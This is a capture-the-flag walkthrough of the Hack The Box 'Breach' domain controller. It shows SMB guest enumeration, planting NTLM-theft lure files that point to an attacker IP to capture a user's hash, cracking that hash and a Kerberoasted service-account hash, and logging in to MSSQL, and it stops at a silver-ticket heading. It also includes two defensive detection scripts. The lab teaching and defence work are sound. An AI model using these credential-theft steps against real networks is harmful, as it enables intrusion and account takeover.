HTB | Breach

Machine - https://app.hackthebox.com/machines/Breach

IP - 10.129.61.210

Machine Information - The User flag for this Box is located in a non-standard directory, C:\share\transfer\.

NMAP

nmap -sC -sV -p 53,80,88,135,139,445,464,593,636,3268,3269,3389,5985,9389,49664,49668,49677,4992 10.129.61.210 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 03:43 UTC
Nmap scan report for ip-10-129-61-210.ap-south-1.compute.internal (10.129.61.210)
Host is up (0.12s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-15 03:43:48Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open     microsoft-ds?
464/tcp   open     kpasswd5?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
3389/tcp  open     ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Not valid before: 2025-09-07T08:04:48
|_Not valid after:  2026-03-09T08:04:48
|_ssl-date: 2025-10-15T03:45:18+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-10-15T03:44:39+00:00
4992/tcp  filtered unknown
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open     mc-nmf        .NET Message Framing
49664/tcp open     msrpc         Microsoft Windows RPC
49668/tcp open     msrpc         Microsoft Windows RPC
49677/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-10-15T03:44:40
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.80 seconds

Port 80

Port 80 serves the default IIS welcome page:

curl http://10.129.61.210/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
        color:#000000;
        background-color:#0072C6;
        margin:0;
}

#container {
        margin-left:auto;
        margin-right:auto;
        text-align:center;
        }

a img {
        border:none;
}

-->
</style>
</head>
<body>
<div id="container">
<a href="http://go.microsoft.com/fwlink/?linkid=66138&amp;clcid=0x409"><img src="iisstart.png" alt="IIS" width="960" height="600" /></a>
</div>
</body>

SMB

Null authentication works, but it does not give us access to enumerate shares or to RID brute-force:

netexec smb 10.129.61.210 -u "" -p "" --shares
SMB         10.129.61.210   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.61.210   445    BREACHDC         [+] breach.vl\: 
SMB         10.129.61.210   445    BREACHDC         [-] Error enumerating shares: STATUS_ACCESS_DENIED

netexec smb 10.129.61.210 -u "" -p "" --rid-brute
SMB         10.129.61.210   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.61.210   445    BREACHDC         [+] breach.vl\: 
SMB         10.129.61.210   445    BREACHDC         [-] Error connecting: LSAD SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.

Let's check the guest login: not only can we authenticate as guest, we can also enumerate shares.

netexec smb 10.129.61.210 -u "guest" -p "" --shares
SMB         10.129.61.210   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.61.210   445    BREACHDC         [+] breach.vl\guest: 
SMB         10.129.61.210   445    BREACHDC         [*] Enumerated shares
SMB         10.129.61.210   445    BREACHDC         Share           Permissions     Remark
SMB         10.129.61.210   445    BREACHDC         -----           -----------     ------
SMB         10.129.61.210   445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.129.61.210   445    BREACHDC         C$                              Default share
SMB         10.129.61.210   445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.129.61.210   445    BREACHDC         NETLOGON                        Logon server share 
SMB         10.129.61.210   445    BREACHDC         share           READ,WRITE      
SMB         10.129.61.210   445    BREACHDC         SYSVOL                          Logon server share 
SMB         10.129.61.210   445    BREACHDC         Users           READ   

RID brute-forcing also works as guest, which gives us a list of domain users and groups:

netexec smb 10.129.61.210 -u "guest" -p "" --rid-brute
SMB         10.129.61.210   445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.61.210   445    BREACHDC         [+] breach.vl\guest: 
SMB         10.129.61.210   445    BREACHDC         498: BREACH\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         500: BREACH\Administrator (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         501: BREACH\Guest (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         502: BREACH\krbtgt (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         512: BREACH\Domain Admins (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         513: BREACH\Domain Users (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         514: BREACH\Domain Guests (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         515: BREACH\Domain Computers (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         516: BREACH\Domain Controllers (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         517: BREACH\Cert Publishers (SidTypeAlias)
SMB         10.129.61.210   445    BREACHDC         518: BREACH\Schema Admins (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         519: BREACH\Enterprise Admins (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         520: BREACH\Group Policy Creator Owners (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         521: BREACH\Read-only Domain Controllers (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         522: BREACH\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         525: BREACH\Protected Users (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         526: BREACH\Key Admins (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         527: BREACH\Enterprise Key Admins (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         553: BREACH\RAS and IAS Servers (SidTypeAlias)
SMB         10.129.61.210   445    BREACHDC         571: BREACH\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.129.61.210   445    BREACHDC         572: BREACH\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.129.61.210   445    BREACHDC         1000: BREACH\BREACHDC$ (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1101: BREACH\DnsAdmins (SidTypeAlias)
SMB         10.129.61.210   445    BREACHDC         1102: BREACH\DnsUpdateProxy (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         1103: BREACH\SQLServer2005SQLBrowserUser$BREACHDC (SidTypeAlias)
SMB         10.129.61.210   445    BREACHDC         1104: BREACH\staff (SidTypeGroup)
SMB         10.129.61.210   445    BREACHDC         1105: BREACH\Claire.Pope (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1106: BREACH\Julia.Wong (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1107: BREACH\Hilary.Reed (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1108: BREACH\Diana.Pope (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1109: BREACH\Jasmine.Price (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1110: BREACH\George.Williams (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1111: BREACH\Lawrence.Kaur (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1112: BREACH\Jasmine.Slater (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1113: BREACH\Hugh.Watts (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1114: BREACH\Christine.Bruce (SidTypeUser)
SMB         10.129.61.210   445    BREACHDC         1115: BREACH\svc_mssql (SidTypeUser)

Let's note the user names and use smbclient to look for files in the share named share:

smbclient -U guest //10.129.61.210/share
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Oct 15 04:27:12 2025
  ..                                DHS        0  Tue Sep  9 10:35:32 2025
  finance                             D        0  Thu Feb 17 11:19:34 2022
  software                            D        0  Thu Feb 17 11:19:12 2022
  transfer                            D        0  Mon Sep  8 10:13:44 2025

                7863807 blocks of size 4096. 1518359 blocks available
smb: \> 

We can see three folders in this share; finance and software are both empty. transfer, on the other hand, contains some directories:

smb: \> ls transfer\
  .                                   D        0  Mon Sep  8 10:13:44 2025
  ..                                  D        0  Wed Oct 15 04:27:12 2025
  claire.pope                         D        0  Thu Feb 17 11:21:35 2022
  diana.pope                          D        0  Thu Feb 17 11:21:19 2022
  julia.wong                          D        0  Thu Apr 17 00:38:12 2025

We can't list the contents of these directories, but since each is named after a user, it is a reasonable assumption that those users connect to this share and browse it regularly.

smb: \> ls transfer\claire.pope\
NT_STATUS_ACCESS_DENIED listing \transfer\claire.pope\
smb: \> ls transfer\diana.pope\
NT_STATUS_ACCESS_DENIED listing \transfer\diana.pope\
smb: \> ls transfer\julia.wong\
NT_STATUS_ACCESS_DENIED listing \transfer\julia.wong\

Foothold/shell

Shell as julia.wong

NTLM theft

Let's generate lure files with ntlm_theft (https://github.com/Greenwolf/ntlm_theft) and upload them to the writable share:

python3 ntlm_theft/ntlm_theft.py  --server 10.10.14.18 --generate all --filename important
/home/admin/breach/ntlm_theft/ntlm_theft.py:168: SyntaxWarning: invalid escape sequence '\l'
  location.href = 'ms-word:ofe|u|\\''' + server + '''\leak\leak.docx';
Created: important/important.scf (BROWSE TO FOLDER)
Created: important/important-(url).url (BROWSE TO FOLDER)
Created: important/important-(icon).url (BROWSE TO FOLDER)
Created: important/important.lnk (BROWSE TO FOLDER)
Created: important/important.rtf (OPEN)
Created: important/important-(stylesheet).xml (OPEN)
Created: important/important-(fulldocx).xml (OPEN)
Created: important/important.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: important/important-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: important/important-(handler).htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE)
Created: important/important-(includepicture).docx (OPEN)
Created: important/important-(remotetemplate).docx (OPEN)
Created: important/important-(frameset).docx (OPEN)
Created: important/important-(externalcell).xlsx (OPEN)
Created: important/important.wax (OPEN)
Created: important/important.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY)
Created: important/important.asx (OPEN)
Created: important/important.jnlp (OPEN)
Created: important/important.application (DOWNLOAD AND OPEN)
Created: important/important.pdf (OPEN AND ALLOW)
Created: important/zoom-attack-instructions.txt (PASTE TO CHAT)
Created: important/important.library-ms (BROWSE TO FOLDER)
Created: important/Autorun.inf (BROWSE TO FOLDER)
Created: important/desktop.ini (BROWSE TO FOLDER)
Created: important/important.theme (THEME TO INSTALL
Generation Complete.

Now let's upload the files and wait for the callback on our listener:

#upload
smb: \> cd transfer\
smb: \transfer\> recurse ON
smb: \transfer\> prompt OFF
smb: \transfer\> mput *
putting file important.application as \transfer\important.application (4.4 kb/s) (average 4.4 kb/s)
putting file important-(externalcell).xlsx as \transfer\important-(externalcell).xlsx (15.7 kb/s) (average 10.1 kb/s)
putting file important-(fulldocx).xml as \transfer\important-(fulldocx).xml (102.0 kb/s) (average 54.9 kb/s)
putting file important.theme as \transfer\important.theme (3.7 kb/s) (average 43.0 kb/s)
putting file important-(url).url as \transfer\important-(url).url (0.1 kb/s) (average 34.6 kb/s)
putting file important-(icon).url as \transfer\important-(icon).url (0.2 kb/s) (average 28.1 kb/s)
putting file important-(stylesheet).xml as \transfer\important-(stylesheet).xml (0.3 kb/s) (average 23.8 kb/s)
putting file important.m3u as \transfer\important.m3u (0.1 kb/s) (average 21.3 kb/s)
putting file important.lnk as \transfer\important.lnk (4.6 kb/s) (average 19.5 kb/s)
putting file important-(handler).htm as \transfer\important-(handler).htm (0.3 kb/s) (average 17.8 kb/s)
putting file important.rtf as \transfer\important.rtf (0.1 kb/s) (average 13.7 kb/s)
putting file zoom-attack-instructions.txt as \transfer\zoom-attack-instructions.txt (0.3 kb/s) (average 12.9 kb/s)
putting file important.jnlp as \transfer\important.jnlp (0.5 kb/s) (average 12.1 kb/s)
putting file important.library-ms as \transfer\important.library-ms (3.2 kb/s) (average 11.7 kb/s)
putting file important.pdf as \transfer\important.pdf (1.8 kb/s) (average 11.1 kb/s)
putting file important.htm as \transfer\important.htm (0.2 kb/s) (average 10.6 kb/s)
putting file important.scf as \transfer\important.scf (0.2 kb/s) (average 10.2 kb/s)
putting file important-(includepicture).docx as \transfer\important-(includepicture).docx (27.5 kb/s) (average 10.9 kb/s)
putting file important-(remotetemplate).docx as \transfer\important-(remotetemplate).docx (70.5 kb/s) (average 13.3 kb/s)
putting file desktop.ini as \transfer\desktop.ini (0.1 kb/s) (average 12.7 kb/s)
putting file Autorun.inf as \transfer\Autorun.inf (0.2 kb/s) (average 12.3 kb/s)
putting file important-(frameset).docx as \transfer\important-(frameset).docx (26.8 kb/s) (average 12.8 kb/s)
putting file important.wax as \transfer\important.wax (0.2 kb/s) (average 12.4 kb/s)
putting file important.asx as \transfer\important.asx (0.4 kb/s) (average 12.0 kb/s)

#on responder
[SMB] NTLMv2-SSP Client   : 10.129.193.217
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:732a70946b9eb1c<--SNIP-->
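A defender-side check for the kind of planted files used above, added here as an example (it is not part of the writeup or of the ntlm_theft project): it walks a share and flags the Explorer-parsed file types whose UNC or file:// target lies outside a trusted host list. The sample share contents, the outside IP 10.10.14.18 and the trusted host name are constructed for the example.

```python
import re
import tempfile
from pathlib import Path

# File types Explorer parses as soon as a folder is listed (the "BROWSE TO
# FOLDER" entries in the ntlm_theft output). Each can carry a UNC path that
# Windows resolves with the credentials of whoever browses the share.
TRIGGER_EXTS = {".scf", ".url", ".ini", ".library-ms", ".lnk", ".theme", ".inf"}

# A UNC reference (\\host\...) or a file:// URL with a host component.
UNC_RE = re.compile(r"(?:\\\\|file://)([A-Za-z0-9._-]+)[\\/]")


def find_unc_hosts(data: bytes) -> set:
    """Return the set of hosts referenced by UNC or file:// paths in a file.

    The bytes are tried as 8-bit text and as UTF-16-LE, because .lnk files and
    Unicode .ini/.library-ms files store their paths in UTF-16.
    """
    hosts = set()
    for text in (data.decode("latin-1"), data.decode("utf-16-le", errors="ignore")):
        hosts.update(m.group(1).lower() for m in UNC_RE.finditer(text))
    return hosts


def scan_share(root, trusted_hosts) -> list:
    """Walk a share and report trigger-type files whose UNC target is not a
    trusted host (e.g. an outside IP instead of the domain's file server)."""
    root = Path(root)
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for path in root.rglob("*"):
        if not path.is_file() or path.suffix.lower() not in TRIGGER_EXTS:
            continue
        rogue = sorted(h for h in find_unc_hosts(path.read_bytes()) if h not in trusted)
        if rogue:
            findings.append((path.relative_to(root).as_posix(), rogue))
    return sorted(findings)


def build_sample_share() -> str:
    """Create a constructed copy of the 'share' layout from the writeup in a
    temporary directory: three planted trigger files pointing at an outside IP,
    one legitimate shortcut to the DC, and an unrelated text file."""
    root = Path(tempfile.mkdtemp(prefix="share_"))
    transfer = root / "transfer"
    transfer.mkdir()
    (transfer / "important.scf").write_text(
        "[Shell]\r\nCommand=2\r\nIconFile=\\\\10.10.14.18\\share\\icon.ico\r\n"
    )
    (transfer / "important-(url).url").write_text(
        "[InternetShortcut]\r\nURL=file://10.10.14.18/share/index.html\r\n"
    )
    # desktop.ini is commonly written as UTF-16-LE with a byte-order mark
    (transfer / "desktop.ini").write_bytes(
        "\ufeff[.ShellClassInfo]\r\nIconResource=\\\\10.10.14.18\\share\\x.ico,0\r\n".encode("utf-16-le")
    )
    (transfer / "finance.url").write_text(
        "[InternetShortcut]\r\nURL=file://BREACHDC.breach.vl/share/finance/report.xlsx\r\n"
    )
    (transfer / "notes.txt").write_text("nothing to see here\r\n")
    return str(root)


if __name__ == "__main__":
    for rel, hosts in scan_share(build_sample_share(), {"breachdc.breach.vl"}):
        print(f"{rel}: points at untrusted host(s) {', '.join(hosts)}")
```

Run it against a mounted copy of a writable share on a schedule; any hit on a host that is not one of your own servers is the lure being planted, before a user browses the folder.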

Let's try to crack the hash; we get the password:

hashcat Julia.hash /opt/rockyou.txt 
<--SNIP-->
JULIA.WONG::BREACH:732a70946b9eb1c7:2ac462323f73db38cae919a53abbbd45:0101000000000000804431e9b43ddc01280ba44f7affc8b00000000002000800590033003200560001001e00570049004e002d0055004f0048004200460055003000370046004f00560004003400570049004e002d0055004f0048004200460055003000370046004f0056002e0059003300320056002e004c004f00430041004c000300140059003300320056002e004c004f00430041004c000500140059003300320056002e004c004f00430041004c0007000800804431e9b43ddc0106000400020000000800300030000000000000000100000000200000b204d424d7f4335a8bb4efbea44d5aceceeb449e540dc2ade3564b548f0cb0110a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00310038000000000000000000:Computer1
<--SNIP-->

Now we can log in as julia.wong over SMB and get user.txt:

smbclient -U "julia.wong" //10.129.193.217/share/
Password for [WORKGROUP\julia.wong]:
Try "help" to get a list of possible commands.
smb: \> cd transfer\julia.wong\
smb: \transfer\julia.wong\> ls
  .                                   D        0  Thu Apr 17 00:38:12 2025
  ..                                  D        0  Wed Oct 15 09:12:21 2025
  user.txt                            A       32  Thu Apr 17 00:38:22 2025

                7863807 blocks of size 4096. 1527110 blocks available

Privilege Escalation

Shell as ?

Kerberoasting

Since we have a valid credential, we can perform Kerberoasting:

netexec ldap 10.129.193.217 -u "JULIA.WONG" -p "Computer1" --kerberoasting output.txt
LDAP        10.129.193.217  389    BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.193.217  389    BREACHDC         [+] breach.vl\JULIA.WONG:Computer1 
LDAP        10.129.193.217  389    BREACHDC         [*] Skipping disabled account: krbtgt
LDAP        10.129.193.217  389    BREACHDC         [*] Total of records returned 1
LDAP        10.129.193.217  389    BREACHDC         [*] sAMAccountName: svc_mssql, memberOf: [], pwdLastSet: 2022-02-17 10:43:08.106169, lastLogon: 2025-10-15 08:49:59.732920
LDAP        10.129.193.217  389    BREACHDC         $krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl\svc_mssql*$4cc2c89e635008ed270cb0da3d8d515c$<--SNIP-->

This gives us the TGS hash for svc_mssql. Cracking it with hashcat yields the password:

hashcat output.txt /opt/rockyou.txt 
<--SNIP-->
 $krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl\\svc_mssql*$4cc2c89e635008ed270cb0da3d8d515c$c4947cd8237a6e22cbaaa420e0369af3be06cabb5b71f4c46a7f385bc9a98704fb547b94d882c5fa0a96e14174bfbd374c9b12a3d8965f6fe44bc539a1bac1aae9b1a70a2c941378b209cabedec4c9bbbe8914fe1eebeb135a403a599ca0ac9b5f17e6b77fe118d8f7f71f84152f7e54f16a0a36c70ce3224953b3ab9f4e4c68a68001480994572e3ea3c76d0967689457fdd7934e7b17bcdee867f6dd66135547f4ba0a5e6acacdf79888e8de0cd80effc873c3518bcc7fad37d8df9191c8927dc3648bc9df9936f7c4d98488a03e19936bacc56a70445b10d341902b25322dc534ea4bb9a587e282ee1df249c57e1b715a66840033f9d78789323fdb8c42166b89e6cea58ac194442e3a76f77dbcb0ef7b2e94d8797167d0c9dbc8bcf4e961ae4154697101c13ccafa2170e3ce9f3afed3b69a1057d3c3c37c72baf312d0ca6e4fb8e7e342374029d265beb88931cafd4a1468377b47fcd133b1c4817d6e5f0f784ef6764b0f0beaa6cd767c79cc990d741e09c47e7b1b151a456d56287c1066c2edebaf9b9d16a627b13fd63ee939c9475888071c12a77100996a02dfee9da01fe6f4792be324e46ec54035b1dc86f43cdf0980ee2ec486f36abea137c17756250fc496ffc49afd9c06a380d4d8aa38fb0e94eb40c3621296a3447ae3c091257d3ecc4bf5bb4b947b5e089d91029565c492dae6db237c7f2712fd6a34936b1dbd8dd7d08883c44fa1db28cfd169254686b96c355957b12e5ee27f9546f35d0d66282d7fa4ec2177b78059fa70196b8ad8e60a268389f60aa40d24df565102fe8bff433d1d2111c4304421704a69e92a2e8bb3f866c3f01038e1e14b69a35be7c5a039dd59d3be9e2f761c3e50fe18191746e609cad34da668e59683f9fe1326fa765254e75913735f679ee8a9ab9ff258c744ca2add49aa2dd508405b80406f2b98ebfce49e28a341af964d9dfc489d21b47336048df0437230906ad241730b84a3dab5689826f8a26be228db2bc058ae69d72d497fb23e40e39f4998f4662bdf0368cded541194a58872eec45d24d525d74c34c7634c5d2d2160b5da5d4307a1fa392f2a06f34fa22d3ef5f89e956b848ec92c65fec299754607b842c33ac4f4caa710ed7b7e33795f67774844674b56181ff57a7c5d8a99b2f9bd625ca4a8bddd628174916608b2255027340aae4e778f2ca15c4060ed04d976720c33179b9d63a7620fc2689d5920a0b856a273b54600f7b56077bead35a1d92485ff402690076f23eaf875cc0c530fdd84b45735e78213ecf7d4c6e84bd65925999f56fcd977b9c5188ffa5aa809c557d801f28c94f4b539f07d3a99921a5
07b4d603f0b4fdb32e92b69b72fbbcb1b26dcd5888ec04f17226e0209dc0bfa0c81b14b0b72c17992e789c6d17a31a78e85d6aeaf14523d427fc8a429d78db1becaea84699cafc31edf72cbe4960e6e73950bf4e21942c432:Trustno1
<--SNIP-->
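The request above leaves a trace on the DC: every service ticket issued is a Security event 4769, and the $krb5tgs$23$ prefix means the ticket was RC4-encrypted (etype 0x17), the cheap-to-crack case. As an added example, not part of the writeup, the detection below parses constructed 4769 messages and flags RC4 tickets requested for SPN-bearing user accounts; svc_backup, the second SPN account, and the client addresses are invented for the sample.

```python
import re
from collections import defaultdict

# Fields of Windows Security event 4769 ("A Kerberos service ticket was
# requested") as they appear in the event's message text.
FIELD_RE = re.compile(
    r"^\s*(Account Name|Service Name|Ticket Encryption Type|Failure Code|Client Address):\s*(\S+)",
    re.M,
)

RC4_HMAC = 0x17  # the "23" in $krb5tgs$23$; AES tickets (0x11/0x12) crack far slower


def parse_4769(text: str) -> dict:
    """Pull the fields the detection needs out of one 4769 message."""
    f = dict(FIELD_RE.findall(text))
    return {
        "requester": f.get("Account Name", "").split("@")[0],
        "service": f.get("Service Name", ""),
        "etype": int(f.get("Ticket Encryption Type", "0x0"), 16),
        "failure": f.get("Failure Code", "0x0"),
        "client": f.get("Client Address", ""),
    }


def detect_kerberoast(events, roastable_accounts, min_services=2):
    """Flag successful RC4 service-ticket requests for user accounts that carry
    an SPN, and report requesters that asked for several of them at once (what
    a roast of every SPN, as netexec does above, looks like on the DC).

    roastable_accounts: sAMAccountNames of SPN-bearing *user* accounts, the
    same set the LDAP query in the writeup returns (svc_mssql here)."""
    alerts = []
    services_by_requester = defaultdict(set)
    for raw in events:
        ev = parse_4769(raw)
        if ev["failure"] != "0x0":
            continue  # a failed request yields no ticket, hence no hash
        if ev["service"].endswith("$") or ev["service"] == "krbtgt":
            continue  # machine and krbtgt keys are random, not wordlist-crackable
        if ev["etype"] == RC4_HMAC and ev["service"] in roastable_accounts:
            alerts.append((ev["requester"], ev["service"], ev["client"]))
            services_by_requester[ev["requester"]].add(ev["service"])
    bulk = {u: sorted(s) for u, s in services_by_requester.items() if len(s) >= min_services}
    return alerts, bulk


def _event(account, service, etype, client="::ffff:10.10.14.18", failure="0x0"):
    """Build a constructed 4769 message in the layout Windows uses."""
    return (
        "A Kerberos service ticket was requested.\n\n"
        "Account Information:\n"
        f"\tAccount Name:\t\t{account}@BREACH.VL\n"
        "\tAccount Domain:\t\tBREACH.VL\n\n"
        "Service Information:\n"
        f"\tService Name:\t\t{service}\n\n"
        "Network Information:\n"
        f"\tClient Address:\t\t{client}\n\n"
        "Additional Information:\n"
        "\tTicket Options:\t\t0x40810000\n"
        f"\tTicket Encryption Type:\t{etype}\n"
        f"\tFailure Code:\t\t{failure}\n"
    )


# Constructed sample: Julia.Wong roasting svc_mssql (as in the writeup) and an
# invented svc_backup, a normal AES ticket for the DC, and one failed request.
SAMPLE_EVENTS = [
    _event("JULIA.WONG", "svc_mssql", "0x17"),
    _event("JULIA.WONG", "svc_backup", "0x17"),
    _event("JULIA.WONG", "BREACHDC$", "0x12", client="::ffff:10.129.193.50"),
    _event("HUGH.WATTS", "svc_mssql", "0x17", failure="0x1b"),
]

if __name__ == "__main__":
    alerts, bulk = detect_kerberoast(SAMPLE_EVENTS, {"svc_mssql", "svc_backup"})
    for who, svc, src in alerts:
        print(f"RC4 service ticket for {svc} requested by {who} from {src}")
    for who, svcs in bulk.items():
        print(f"{who} requested {len(svcs)} roastable accounts: {', '.join(svcs)}")
```

The corresponding hardening is visible in the same hash: moving svc_mssql to AES-only (msDS-SupportedEncryptionTypes) or to a gMSA removes the RC4 ticket that made a rockyou crack feasible.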

Strangely, on my initial scan I didn't see MSSQL open, but it is open now.

nmap -sCV -p1433 breach.vl
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 10:26 UTC
Nmap scan report for breach.vl (10.129.193.217)
Host is up (0.12s latency).

PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-15T08:50:11
|_Not valid after:  2055-10-15T08:50:11
|_ssl-date: 2025-10-15T10:27:07+00:00; 0s from scanner time.

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.88 seconds

for proto in {ldap,smb,mssql,winrm}; do nxc $proto breach.vl -d breach.vl -u 'svc_mssql' -p  'Trustno1'; echo; done
LDAP        10.129.193.217  389    BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.193.217  389    BREACHDC         [+] breach.vl\svc_mssql:Trustno1 

SMB         10.129.193.217  445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.193.217  445    BREACHDC         [+] breach.vl\svc_mssql:Trustno1 

MSSQL       10.129.193.217  1433   BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl)
MSSQL       10.129.193.217  1433   BREACHDC         [+] breach.vl\svc_mssql:Trustno1 

WINRM       10.129.193.217  5985   BREACHDC         [*] Windows Server 2022 Build 20348 (name:BREACHDC) (domain:breach.vl) 
WINRM       10.129.193.217  5985   BREACHDC         [-] breach.vl\svc_mssql:Trustno1

Let's log in as svc_mssql:

mssqlclient.py svc_mssql@breach.vl -windows-auth
Impacket v0.13.0.dev0+20251006.23741.2d6c563c - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (BREACH\svc_mssql  guest@master)> 

We can use xp_dirtree to list directories on the host:

xp_dirtree C:\
subdirectory                depth   file   
-------------------------   -----   ----   
$Recycle.Bin                    1      0   
$WinREAgent                     1      0   
Boot                            1      0   
Documents and Settings          1      0   
EFI                             1      0   
inetpub                         1      0   
PerfLogs                        1      0   
Program Files                   1      0   
Program Files (x86)             1      0   
ProgramData                     1      0   
Recovery                        1      0   
share                           1      0   
System Volume Information       1      0   
Users                           1      0   
Windows                         1      0 

Silver Ticket Attack

Since we have the credentials for the account this service runs as, a new attack vector opens up for us: a silver ticket attack.

How does this work?

